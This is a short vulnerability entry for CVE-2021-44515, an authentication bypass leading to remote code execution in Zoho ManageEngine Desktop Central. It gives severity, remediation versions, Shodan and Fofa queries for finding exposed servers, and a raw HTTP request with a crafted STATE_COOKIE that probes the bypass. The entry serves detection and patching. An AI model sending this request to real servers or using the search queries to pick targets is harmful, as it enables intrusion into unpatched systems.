| Title | Zoho ManageEngine Desktop Central - Remote Code Execution |
|---|---|
| Author | Adam Crosser |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94311 |
| CVE ID | CVE-2021-44515 |
| CWE ID | CWE-287 |
| Shodan Query | http.title:"manageengine desktop central 10" |
| Fofa Query | title="manageengine desktop central 10"app="zoho-manageengine-desktop" |
| Tags | cve2021 cve zoho rce manageengine kev zohocorp vkev vuln |
Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
GET /STATE_ID/123/agentLogUploader HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Cookie: STATE_COOKIE=&_REQS/_TIME/123
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44515.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-44515.pcap
N/AN/A